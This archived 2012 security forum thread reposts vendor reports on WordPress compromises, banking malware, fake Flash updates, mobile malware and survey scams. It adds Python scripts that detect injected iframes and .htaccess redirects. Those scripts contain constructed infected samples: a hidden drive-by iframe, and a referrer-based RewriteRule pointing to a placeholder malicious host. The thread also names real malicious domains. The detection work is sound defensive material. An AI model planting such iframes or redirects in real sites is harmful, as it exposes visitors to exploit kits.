
Thread: SPAM frauds, fakes, and other MALWARE deliveries - archive

  1. #561
    Adviser Team AplusWebMaster
    Join Date
    Oct 2005
    Location
    USA
    Posts
    6,881

    Cybercriminals moving from TLD .ru to .su

    FYI...

    Cybercriminals moving from TLD .ru to .su
    - http://www.abuse.ch/?p=3581
    Jan 29, 2012 - "... The Top Level Domain .ru is managed by the Coordination Center for TLD RU (cctld.ru). CCTLD.ru finally did their job well and addressed the reputation problem TLD.ru had by setting up new terms and conditions for domain name registration of .ru domains... .su is (... was) the Top Level Domain for the Soviet Union, which we all know doesn’t exist any more. Nevertheless, TLD .su (... operated by RIPN) is still active today which means that people can still register domain names with that TLD. As of today I’m seeing an increasing number of malicious .su domains being used by botnet herders. In fact this means that the criminals seem to be switching from .ru to .su ... If you don’t see any legit .su domains being hit/used in your company just simply -block- it."

    Thanks for the link go to:
    - http://www.malwaredomains.com/wordpress/?p=2428
    Jan 29, 2012

    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...

  2. #562
    AplusWebMaster

    WordPress exploit in-the-wild for v3.2.1 sites ...

    FYI...

    - http://community.websense.com/blogs/...ploit-kit.aspx
    * Update 2012/02/06: After obtaining access to logs and PHP files from compromised Web servers, further analysis indicates that most of the compromised Web sites were running older versions of WordPress, but they were not all running 3.2.1. The attackers’ exact point of entry is uncertain. At first, we suspected vulnerable WordPress plugins, because a subset of analyzed sites were running vulnerable versions of the same WordPress plugins. Now that we have access to data from several compromised Web servers, the logs show us that, in some cases, the point of entry was compromised FTP credentials. In several instances, once attackers had access, they scanned WordPress directories and injected specific files (e.g., index.php and wp-blog-header.php) with malicious PHP code.
    ___

    WordPress exploit in-the-wild for v3.2.1 sites ...
    - http://community.websense.com/blogs/...ploit-kit.aspx
    30 Jan 2012 - "... site was compromised because it was running an old version of Wordpress (3.2.1) that is vulnerable to publicly available exploits... more interesting is the redirection chain and resulting exploit site... From our analysis the number of infections is growing steadily (100+)... The Java exploit being served is CVE-2011-3544* (Oracle Java Applet Rhino Script Engine Remote Code Execution), which most Exploit Kits adopted in December 2011 because it is cross-platform and exploits a design flaw. Normally, kits use a variety of exploits... regardless of what OS or browser we used for testing, this Exploit Kit attempted to exploit ONLY our Java Runtime Environment (JRE). It did not attempt -any- other exploit... Websense... has found 100+ compromised Web sites, all with similar infection characteristics. The compromised Web sites all share these traits:
    > Running WordPress 3.2.1
    > Force a drive by download via iframe to the same malicious set of domains hosting a PHP Web page in the form of: [subdomain] .osa .pl/showthread.php?t=.*
    > Attempt exploitation using CVE-2011-3544
    If exploitation is successful, (the Tdss rootkit will be installed) on the user's machine.
    If you're running WordPress 3.2.1, we recommend that:
    You upgrade to the latest stable version of WordPress**.
    Check the source code of all your Web pages to see if you've been infected (see the code above). If you have been infected, be sure to upgrade WordPress while simultaneously removing the injected code so that your Web pages aren't simply being reinfected after being cleaned.
    ** https://wordpress.org/download/
    January 3, 2012 - "The latest stable release of WordPress (Version 3.3.1) is available..."

    Massive Compromise of WordPress-based sites...
    - http://labs.m86security.com/2012/01/...fine%E2%80%99/
    Jan 30, 2012 - "... hundreds of websites, based on WordPress 3.2.1... The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit... logs show that users from at least -400- compromised sites were -redirected- to Phoenix exploit pages..."
    ___

    SiteCheck scanner
    - http://sucuri.net/global
    ___

    * http://web.nvd.nist.gov/view/vuln/de...=CVE-2011-3544
    Last revised: 01/27/2012
    "... vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier..."
    CVSS v2 Base Score: 10.0 (HIGH)

    Latest Java versions available here:
    Downloads: http://www.oracle.com/technetwork/ja...ads/index.html

    JRE 6u30: http://www.oracle.com/technetwork/ja...d-1377142.html

    JRE 7u2: http://www.oracle.com/technetwork/ja...d-1377135.html
    ___

    - https://www.virustotal.com/file/7b00...b73e/analysis/
    File name: file-3486436_jar
    Detection ratio: 12/41
    Analysis date: 2012-01-31

    - https://www.virustotal.com/file/f7a1...2483/analysis/
    File name: 39301c3e4ae8ed0e4faf0c3c18cf54a0
    Detection ratio: 10/43
    Analysis date: 2012-01-30

    - https://www.virustotal.com/file/4120...is/1327739797/
    File name: oleda0.027112496150291654.exe
    Detection ratio: 9/43
    Analysis date: 2012-01-28

    Last edited by AplusWebMaster; 2012-02-07 at 15:03.
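The two checks the Websense write-up recommends (look at your rendered pages for the injected iframe, and look at index.php / wp-blog-header.php for code that was not there before) can be scripted. The following is an added example, not code from Websense or from WordPress. It assumes the iframe indicator quoted above (an iframe to [subdomain].osa.pl/showthread.php?t=...), and it assumes you have SHA-256 hashes of the same core files taken from a clean WordPress download to compare against; the sample pages and file contents are constructed stand-ins, not real WordPress files.

```python
import hashlib
import re

# Indicator quoted in the Websense post: a drive-by iframe to
# [subdomain].osa.pl/showthread.php?t=... injected into the site's pages.
INJECTED_IFRAME = re.compile(
    r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?\s*(?:https?:)?//"
    r"([a-z0-9.-]+\.osa\.pl)/showthread\.php\?t=[^'\"\s>]*",
    re.IGNORECASE,
)

# Files the 2012/02/06 update says were injected with PHP once attackers had access.
WATCHED_FILES = ("index.php", "wp-blog-header.php")


def find_injected_iframes(html):
    """Return the osa.pl hosts referenced by injected iframes in one rendered page."""
    return [m.group(1).lower() for m in INJECTED_IFRAME.finditer(html)]


def sha256_of(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def modified_core_files(current_tree, baseline_hashes):
    """Names of watched files whose SHA-256 differs from the pristine release copy.

    current_tree maps file name -> content as read from the web root.
    baseline_hashes maps file name -> SHA-256 of the same file from a clean
    WordPress download (assumed to be computed beforehand from the official zip).
    """
    changed = []
    for name in WATCHED_FILES:
        if name in current_tree and sha256_of(current_tree[name]) != baseline_hashes.get(name):
            changed.append(name)
    return changed


def scan_site(pages, current_tree, baseline_hashes):
    """Combine both checks into one report: pages with the iframe, core files that changed."""
    iframes = {}
    for path, html in pages.items():
        hosts = find_injected_iframes(html)
        if hosts:
            iframes[path] = hosts
    return {
        "iframes": iframes,
        "modified_files": modified_core_files(current_tree, baseline_hashes),
    }


# --- constructed sample data (simplified stand-ins, not real WordPress files or pages) ---
PRISTINE_TREE = {
    "index.php": "<?php\nrequire 'wp-blog-header.php';\n",
    "wp-blog-header.php": "<?php\nrequire_once 'wp-load.php';\n",
}
BASELINE_HASHES = {name: sha256_of(body) for name, body in PRISTINE_TREE.items()}

INFECTED_TREE = dict(PRISTINE_TREE)
INFECTED_TREE["index.php"] = (
    "<?php /* constructed placeholder standing in for prepended code */ ?>\n"
    + PRISTINE_TREE["index.php"]
)

CLEAN_PAGE = "<html><body><p>Hello</p></body></html>"
INFECTED_PAGE = (
    "<html><body><p>Hello</p>"
    '<iframe src="http://sub1.osa.pl/showthread.php?t=72" width="1" height="1" '
    'style="visibility:hidden"></iframe></body></html>'
)

if __name__ == "__main__":
    report = scan_site({"/index.html": INFECTED_PAGE, "/about.html": CLEAN_PAGE},
                       INFECTED_TREE, BASELINE_HASHES)
    print(report)
```

The hash comparison is the more durable of the two checks: the iframe regex only catches this one campaign's pattern, whereas a mismatch against the clean release copy catches any modification of those files, whatever was inserted. Run the baseline from the official download for the exact version you have installed, and re-run both checks after cleaning and upgrading, since the post notes that pages get reinfected when the injected code is not removed at the same time.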

  3. #563
    AplusWebMaster

    Malware redirects bank phone calls to Attackers

    FYI...

    Malware redirects bank phone calls to Attackers
    - http://www.trusteer.com/blog/malware...alls-attackers
    Feb 01, 2012 - "... some new Ice IX configurations that are targeting online banking customers in the UK and US. Ice IX is a modified variant of the ZeuS financial malware platform. In addition to stealing bank account data, these Ice IX configurations are capturing information on telephone accounts belonging to the victims. This allows attackers to divert calls from the bank intended for their customer to attacker controlled phone numbers. We believe the fraudsters are executing fraudulent transactions using the stolen credentials and redirecting the bank’s post-transaction verification phone calls to professional criminal caller services (discussed in a previous Trusteer blog*) that approve the transactions. In one attack captured by Trusteer researchers, at login the malware steals the victim’s user id and password, memorable information/secret question answer, date of birth and account balance. Next, the victim is asked to update their phone numbers of record (home, mobile and work) and select the name of their service provider from a drop-down list. In this particular attack, the three most popular phone service providers in the UK are presented: British Telecommunications, TalkTalk and Sky... To enable the attacker to modify the victim’s phone service settings, the victim is then asked by the malware to submit their telephone account number. This is very private data typically only known to the phone subscriber and the phone company. It is used by the phone company to verify the identity of the subscriber and authorize sensitive account modifications such as call forwarding. The fraudsters justify this request by stating this information is required as a part of verification process caused by "a malfunction of the bank’s anti-fraud system with its landline phone service provider"... 
As we discussed in a recent blog**, fraudsters are increasingly turning to these post-transaction attack methods to hide fraudulent activity from the victim and block email and phone communication from the bank. This allows attackers to circumvent security mechanisms that look for anomalies once transactions have already been executed by the user..."
    * http://www.trusteer.com/blog/apply-s...urself-offline

    ** http://www.trusteer.com/blog/post-tr...ntion-controls
    ___

    - http://www.darkreading.com/taxonomy/...e/id/232600093
    Feb 01, 2012

    Last edited by AplusWebMaster; 2012-02-03 at 18:12.

  4. #564
    AplusWebMaster

    Facebook malware scam

    FYI...

    Facebook malware scam ...
    - http://nakedsecurity.sophos.com/2012...tatus-updates/
    Feb 3, 2012 - "... worrying number of Facebook users posting the same status messages today, claiming that the United States has attacked Iran and Saudi Arabia... If you visit the link mentioned in the status update, you are taken to a -fake- CNN news webpage which claims to contain video footage of conflict... clicking on the video thumbnail prompts the webpage to ask you to install an update to Adobe Flash... Of course, it's not a real Flash update, but malware instead. Remember, you should only ever download a Flash update from the genuine Adobe website. The malware - which Sophos is adding detection for as Troj/Rootkit-KK - drops a rootkit called Troj/Rootkit-JV onto your Windows computer. In addition, Sophos detects the behaviour of the malware as HPsus/FakeAV-J..."

    - http://google.com/safebrowsing/diagn...=facebook.com/
    "... Part of this site was listed for suspicious activity 436 time(s) over the past 90 days... Of the 102194 pages we tested on the site over the past 90 days, 172 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-02-07, and the last time suspicious content was found on this site was on 2012-02-07... Malicious software includes 76 trojan(s), 60 scripting exploit(s). Successful infection resulted in an average of 7 new process(es) on the target machine. Malicious software is hosted on 147 domain(s)... 28 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site... This site was hosted on 74 network(s) including AS32934 (FACEBOOK), AS209 (QWEST), AS2914 (NTT).... Over the past 90 days, facebook.com appeared to function as an intermediary for the infection of 31 site(s)... It infected 6 domain(s)..."

    - http://google.com/safebrowsing/diagnostic?site=AS:32934
    "... over the past 90 days, 151 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2012-02-07, and the last time suspicious content was found was on 2012-02-07... Over the past 90 days, we found 24 site(s) on this network... that appeared to function as intermediaries for the infection of 29 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 2 site(s)... that infected 6 other site(s)..."

    Last edited by AplusWebMaster; 2012-02-07 at 23:31.

  5. #565
    AplusWebMaster

    Mobile malware from German svr ...

    FYI...

    Mobile malware from German svr... 1,351 sites
    - http://blog.trendmicro.com/malicious...an-ip-address/
    Feb 7, 2012 - "... recently found a server that hosts a great number of sites that are used to launch mobile malware, targeting Android OS and Symbian (specifically the J2ME platform). The server, located in Germany, is managed by a hosting provider known as a haven for cyber criminals. We found a total of 1,351 websites hosted on the said server and categorize the sites into five segments based on the type of guise they use for the distributed malware:
    Android Market apps
    Opera Mini/ Phone Optimizer apps
    Pornographic apps (sites were unavailable during time of checking)
    App storage sites
    Others (sites that were inaccessible during time of checking)...
    ... the hosted Apps were still up thus making them available for download through the Android Market App and the Opera Mini/Photo Optimizer App sites. The sites under Android Market apps displayed a website very much similar to the legitimate one. They feature popular applications like WhatsApp, Facebook, Facebook Messenger, Barcode Scanner, Skype, Google Maps, Gmail, YouTube, and others. The files downloaded from such sites are now detected as ANDROIDOS_FAKENOTIFY.A... the sites that feature download links for Opera Mini and Phone Optimizer lead to J2ME_SMSSEND.E - a malware that can run on devices that support MIDlets... Among all the categories mentioned, most of the sites promoted Opera Mini updates and Photo Optimizer Apps compared with others... the attackers are not necessarily targeting only one platform... we also saw that cybercriminals use different social engineering lures. Also, despite the emergence and prevalence of platforms such as Android and iOS, the Symbian platform still seems to be targeted as well..."


  6. #566
    AplusWebMaster

    Malware -redirects- to enormousw1illa .com...

    FYI...

    Malware -redirects- to enormousw1illa .com
    - http://google.com/safebrowsing/diagn...ousw1illa.com/
    2012-02-08 - "Site is listed as suspicious... the last time suspicious content was found on this site was on 2012-02-08. Malicious software includes 8 trojan(s). This site was hosted on 2 network(s) including AS48691* (SPECIALIST), AS17937 (NDMC)... Over the past 90 days, enormousw1illa .com appeared to function as an intermediary for the infection of 177 site(s)... this site has hosted malicious software over the past 90 days. It infected 1090 domain(s)..."
    * http://google.com/safebrowsing/diagnostic?site=AS:48691

    - http://blog.sucuri.net/2012/02/malwa...1illa-com.html
    Feb 2, 2012 - "... seeing a large number of sites compromised with a conditional redirection to the domain http ://enormousw1illa .com/ (194.28.114.102). On all the sites we analyzed, the .htaccess file was modified so that if anyone visited the site from Google, Bing, Yahoo, or any major search engine (by checking the referer), it would get -redirected- to that malicious domain (http ://enormousw1illa com/nl-in .php?nnn=556)... this malware is hosted at the same IP address as other domains that were used in .htaccess attacks in the past**, so we think it is all done by the same group..."
    ** http://blog.sucuri.net/2011/11/htacc...o-dot-com.html

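The Sucuri post describes the .htaccess modification only in outline: the referer is checked for a major search engine and matching visitors are redirected to the malicious domain. A site owner can audit for that shape of rule directly. The following is an added example, not code from Sucuri; it assumes the redirect was done with mod_rewrite RewriteCond/RewriteRule directives (the post does not show the exact lines), it uses the placeholder host malicious.example in place of the domain named in the post, and the two .htaccess files are constructed samples.

```python
import re
from urllib.parse import urlparse

# Referrers the Sucuri post names as the trigger for the conditional redirect.
SEARCH_ENGINES = ("google", "bing", "yahoo")

# Assumed mod_rewrite syntax: a RewriteCond on HTTP_REFERER followed by a RewriteRule.
COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.IGNORECASE)
RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.IGNORECASE)


def find_referer_redirects(htaccess_text, own_hosts):
    """Flag RewriteRule blocks that send search-engine referrals to another host.

    own_hosts is the set of hostnames the site legitimately redirects to; any
    absolute http(s) target outside it that is guarded by an HTTP_REFERER
    condition naming a search engine is reported.
    """
    findings = []
    pending = []  # HTTP_REFERER patterns seen since the last RewriteRule
    for line in htaccess_text.splitlines():
        cond = COND_RE.match(line)
        if cond:
            pending.append(cond.group(1))
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue
        target = rule.group(1)
        engine_conds = [p for p in pending if any(e in p.lower() for e in SEARCH_ENGINES)]
        pending = []  # RewriteCond lines apply only to the next RewriteRule
        if not target.lower().startswith(("http://", "https://")):
            continue  # internal rewrite (e.g. /index.php or "-"), not an off-site redirect
        host = (urlparse(target).hostname or "").lower()
        if engine_conds and host not in own_hosts:
            findings.append({"referer_conditions": engine_conds, "target": target})
    return findings


# --- constructed samples: the stock WordPress block, with and without an appended redirect ---
CLEAN_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
"""

TAMPERED_HTACCESS = CLEAN_HTACCESS + r"""RewriteCond %{HTTP_REFERER} .*google.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.* [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [NC]
RewriteRule ^(.*)$ http://malicious.example/nl-in.php?nnn=556 [R=302,L]
"""

if __name__ == "__main__":
    for label, text in (("clean", CLEAN_HTACCESS), ("tampered", TAMPERED_HTACCESS)):
        print(label, find_referer_redirects(text, {"www.example.com"}))
```

Because the redirect only fires for search-engine referrers, loading your own site directly shows nothing wrong; the rule has to be found in the file, or reproduced by requesting a page with a Referer header set to a search engine. Note also that an .htaccess in any subdirectory applies to that subtree, so the check should be run over every .htaccess under the web root, not just the top-level one.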

  7. #567
    AplusWebMaster

    Free MS Points? Game Over ...

    FYI...

    Free Microsoft Points? Game Over ...
    - http://www.gfi.com/blog/free-microso...game-over-man/
    Feb 8, 2012 - "There’s an Xbox code generator floating around on Youtube and other sites right now, and a pretty popular one at that. How popular?... 20,000+ views so far. The program promises all sorts of Xbox freebies – 1 month of Xbox Live, 12 months if you’re feeling particularly greedy and 1600 to 4000 free Microsoft points*. Of course, everything goes without a hitch in the Youtube video: we see the program boot up, the user selects his target – 1600 MS points – and hits the “Generate Code” button. After a short while, we see a “Hooray, it worked” type message and the person in the video is presented with a code.... [and]... Another survey. Does the creator of this program expect you to fill in a survey / sign up to a ringtone service not once but twice? Absolutely. Is it worth downloading this program, filling in some of those offers and trying it out? Absolutely - not."
    * https://en.wikipedia.org/wiki/Microsoft_Points
    "... currency of the Xbox Live Marketplace, Games for Windows - Live Marketplace, Windows Live Gallery, and Zune online stores..."


  8. #568
    AplusWebMaster

    Cybercrime "factory outlets" – selling in bulk...

    FYI...

    Cybercrime "factory outlets" – fraudsters selling bulk Facebook, Twitter and Web Site Admin credentials
    - https://www.trusteer.com/blog/cyberc...e-admin-creden
    Feb 08, 2012 - "... discovered two cybercrime rings that are advertising what we refer to as a “Factory Outlet” of login credentials for different web sites including Facebook, Twitter and a leading website administration software called cPanel. Financial malware, like Zeus, SpyEye and others, once it infects a machine, is configured to attack specific online banking web sites. In addition to online banking credentials, the malware also captures login credentials used by the victim’s machine to access other web sites and web applications. To monetize the login credentials that pile up, fraudsters have started setting up “Factory Outlets” to sell them off... cybercriminals are offering to sell login credentials to social network sites such as Facebook and Twitter belonging to users all over the world. These can be purchased in bulk, from specific countries (e.g. USA, UK, and Germany) and even coupled with additional personal information such as email addresses... the fraudsters claim that they have 80GB of stolen data from victims. In another so called “Credential Factory Outlet Sale” advertisement, a botnet operator offers to sell login and URL information that would allow a fraudster to take control of certain web sites. Specifically, the advertiser is offering cPanel credentials..."
    (More detail at the trusteer URL above.)
    ___

    Know your enemies Online (graphic)
    - http://blog.trendmicro.com/wp-conten...nemies_WEB.jpg
    ___

    How web threats spread (graphic)
    - http://www.sophos.com/medialibrary/I...520&h=594&as=1
    Source: Sophos Security Threat Report

    Last edited by AplusWebMaster; 2012-02-08 at 23:27.

  9. #569
    AplusWebMaster

    Top 10 threats for January 2012

    FYI...

    Top 10 threats for January 2012
    - http://www.gfi.com/page/113933/cyber...nge-of-victims
    Feb 08, 2012 - "... Report for January 2012, a collection of the 10 most prevalent threat detections encountered during the month. Last month saw malware attacks targeting a wide range of potential victims, including gamers looking for a Pro Evolution Soccer 2012 game crack, small business owners concerned about the reputation of their business, and government organizations receiving spoofed messages from the United States Computer Emergency Readiness Team (US-CERT)... malware writers installing rootkits on the systems of gamers who were looking for a pirated release of Pro Evolution Soccer 2012... scammers also latched onto the buzz surrounding the upcoming fourth installment of the Halo® video game series... by offering bogus beta invites in return for filling out surveys and recommending links on Facebook and Google+. These attacks leverage the popularity of these titles among the gaming community and are meant to take advantage of the mistakes some users might make when acting out of excitement about a favorite game franchise... phishing emails posing as notices from the Better Business Bureau, claiming that a customer had filed a complaint against the recipient. The messages contained links to malware created using the Blackhole exploit kit. Government body US-CERT served as another disguise for cybercriminals attempting to bait unwitting victims into opening a file that contained a variant of the Zeus/Zbot Trojan. Meanwhile, Tumblr users were baited with “free Southwest Airlines tickets” in exchange for taking surveys and submitting personal information by a phony “Tumblr Staff Blog.” Malware writers and internet scammers also sought to attack a wider cross-section of the population when opportunities presented themselves to creatively piggyback on hot news topics and highly trafficked websites. 
This past month, the shutdown of popular file hosting website Megaupload led to a domain typo scam targeting both the regular users of the website as well as visitors who were interested in seeing the FBI notice posted on the site. Once the victims reached the misspelled URL, they were -redirected- to various sites promising fake prizes and asking for personal information..."
    (See "Top 10 Threat Detections for January" list at the gfi URL above.)


  10. #570
    AplusWebMaster

    Bad news brings SCAMS ...

    FYI...

    Bad news brings SCAMS ...
    - http://blog.trendmicro.com/cybercrim...oustons-death/
    Feb 13, 2012 - "... cybercriminals are naturally out there taking advantage of this unfortunate incident... A fake video was seen spreading via the social networking site Facebook... which have the subject “I Cried watching this video. RIP Whitney Houston“, come in the form of a wall post with a link to the supposed video. Once users click on the video, it leads them to a Facebook page that contains a link to the video. However, clicking the said link only leads to several other redirections until users are led to the usual survey scam site... we also found -101- more survey scam domains registered on the same IP where the domains are hosted.... also found tweets with malicious links that also took advantage of the tag RIP Whitney Houston, which was trending worldwide on Twitter... tweets contain a link to a particular blog dedicated to Whitney Houston. Users viewing this page are then -redirected- to another web site, even without them having to click on anything. The succeeding page is a site that supposedly features several Whitney Houston wallpapers, which users can download. Once users decide to download a wallpaper, a pop up window appears that asks users to download some “Whitney Houston ringtones”. Whatever users choose... they will be -redirected- to a survey site that asks for mobile numbers... Using newsworthy events... is a common bait of cybercriminals to lure users into their schemes... always be cautious before clicking any -news- items in their Facebook or Twitter feeds..."
    (Screenshots available at the trendmicro URL above.)

